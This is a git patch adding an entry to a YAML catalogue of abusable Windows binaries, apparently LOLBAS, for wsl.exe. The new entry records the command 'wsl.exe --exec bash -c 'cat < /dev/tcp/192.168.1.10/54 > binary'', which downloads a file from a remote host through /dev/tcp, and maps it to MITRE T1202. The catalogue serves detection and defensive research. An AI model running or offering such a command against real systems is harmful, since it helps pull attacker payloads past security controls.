From 9722cceb9ef18b126147259e6dfa215faa7fa36f Mon Sep 17 00:00:00 2001
From: Oddvar Moe <oddvar.moe@gmail.com>
Date: Wed, 25 Mar 2020 11:33:02 +0100
Subject: [PATCH] Added download example to wsl.exe

---
 yml/OtherMSBinaries/Wsl.yml | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index 257ec57..06b6384 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -28,6 +28,14 @@ Commands:
     MitreID: T1202
     MitreLink: https://attack.mitre.org/techniques/T1202
     OperatingSystem: Windows 10, Windows 19 Server
+  - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
+    Description: Downloads file from 192.168.1.10
+    Usecase: Download file
+    Category: Download
+    Privileges: User
+    MitreID: T1202
+    MitreLink: https://attack.mitre.org/techniques/T1202
+    OperatingSystem: Windows 10, Windows 19 Server
 Full_Path:
   - Path: C:\Windows\System32\wsl.exe
 Code_Sample: